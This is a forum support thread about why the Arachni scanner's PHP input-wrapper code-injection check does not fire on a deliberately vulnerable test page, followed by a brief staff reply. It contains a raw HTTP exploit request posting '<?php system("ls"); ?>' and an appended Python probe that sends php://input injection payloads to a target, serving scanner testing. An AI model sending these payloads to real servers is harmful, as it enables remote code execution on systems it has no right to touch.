[Check] code injection php input wrapper does not work properly?


Malween Le Goffic

22 Nov, 2017 10:00 PM

Hello Tasos,

I am trying to raise the "code injection php input wrapper" check, but the Arachni scan does not raise anything.

Here is the sample code (PHP):

    <title>Code injection (php input wrapper)</title>
    <h1>Code injection (php input wrapper)</h1>
    <form action="" method="get">
        <label for="untrusted_input">Input :</label>
        <input type="text" id="untrusted_input" name="untrusted_input"/>
        <input type="submit" value="Submit"/>
    </form>
    <?php
    if(isset($_GET['untrusted_input'])) {
        // body of the if block not shown in the original post
    }
    ?>

The vulnerability can be exploited with a few modifications (GET -> POST, the untrusted parameter set to the php wrapper, and a POST payload added):

POST /code_injection/code_injection_php_input_wrapper.php?untrusted_input=php://input HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

untrusted_input=<?php system("ls"); ?>

I looked in the code_injection_php_input_wrapper.rb source code and noticed the specific payload "vDBVBsbVdv PLL!8o7". But when I analyse my Apache log files, no such data is posted (only php://input is tested, without a payload).

Do you have any idea why Arachni does not raise an alert?

Best regards,
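The following is an added example, not Arachni's check and not code from the post above: a hand-rolled probe for a test page of this kind, useful for confirming that the vulnerability is reachable independently of the scanner. It assumes the page include()s the value of the GET parameter (the include itself is not shown in the post), so that a raw POST body of PHP source is executed and its output lands in the response. The function names, the marker-splitting trick and the constructed fake responses are mine.

```python
"""Probe a php://input code-injection test page with a unique marker.

Added example, not Arachni's check and not the poster's code. Assumes the
test page include()s the value of the GET parameter (the include itself is
not shown in the post), so a POST body of PHP source is executed.
"""
import re
import secrets
import string
import urllib.request
from typing import Callable, Dict, Tuple

Request = Tuple[str, str, Dict[str, str], bytes]  # method, url, headers, body


def make_marker(length: int = 12) -> str:
    """Random alphanumeric marker; a fixed string could already occur in the page."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


def build_probe(base_url: str, param: str, marker: str) -> Request:
    """Wrapper goes in the GET parameter, PHP source goes in the raw POST body.

    include('php://input') reads the raw body, so the body is bare PHP source
    (no 'param=' prefix). The marker is split and re-joined by PHP's '.' so
    that a page which merely reflects the body does not contain the marker.
    """
    half = len(marker) // 2
    body = f"<?php echo '{marker[:half]}'.'{marker[half:]}'; ?>".encode()
    headers = {
        # php://input is not readable for multipart/form-data bodies; text/plain
        # also stops PHP from treating the body as form fields.
        "Content-Type": "text/plain",
        "Content-Length": str(len(body)),
    }
    return ("POST", f"{base_url}?{param}=php://input", headers, body)


def executed(response_body: bytes, marker: str) -> bool:
    """True only if PHP ran the body: reflection yields 'AB'.'CD', not 'ABCD'."""
    return marker.encode() in response_body


def send_http(request: Request) -> bytes:
    """Real transport, only used when probing a live target."""
    method, url, headers, body = request
    req = urllib.request.Request(url, data=body, headers=headers, method=method)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read()


def probe(base_url: str, param: str,
          send: Callable[[Request], bytes] = send_http,
          marker: str = "") -> Tuple[bool, str]:
    """Return (code executed?, marker used)."""
    marker = marker or make_marker()
    return executed(send(build_probe(base_url, param, marker)), marker), marker


if __name__ == "__main__":
    # Constructed fake servers standing in for a live target, so this runs offline.
    page = "http://localhost/code_injection/code_injection_php_input_wrapper.php"

    def vulnerable(req: Request) -> bytes:
        # Emulates include('php://input'): concatenates the quoted strings echoed by the body.
        return b"<h1>Code injection (php input wrapper)</h1>" + b"".join(re.findall(rb"'([^']*)'", req[3]))

    def reflecting(req: Request) -> bytes:
        # Echoes the body back without executing it (must NOT count as a hit).
        return b"<pre>" + req[3] + b"</pre>"

    print(probe(page, "untrusted_input", send=vulnerable))   # (True, <marker>)
    print(probe(page, "untrusted_input", send=reflecting))   # (False, <marker>)
```

Against a real target, call `probe(url, "untrusted_input")` and leave `send` at its default so the request goes over HTTP; the only thing the response needs to contain is the re-joined marker, which a page that echoes the raw body back cannot produce.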

1. Posted by Tasos Laskos (Support Staff) on 19 Dec, 2017 04:33 PM

    Sorry, I don't, I'll run some tests and get back to you.

    PS. Sorry for the excessively late reply, I've been working on something.
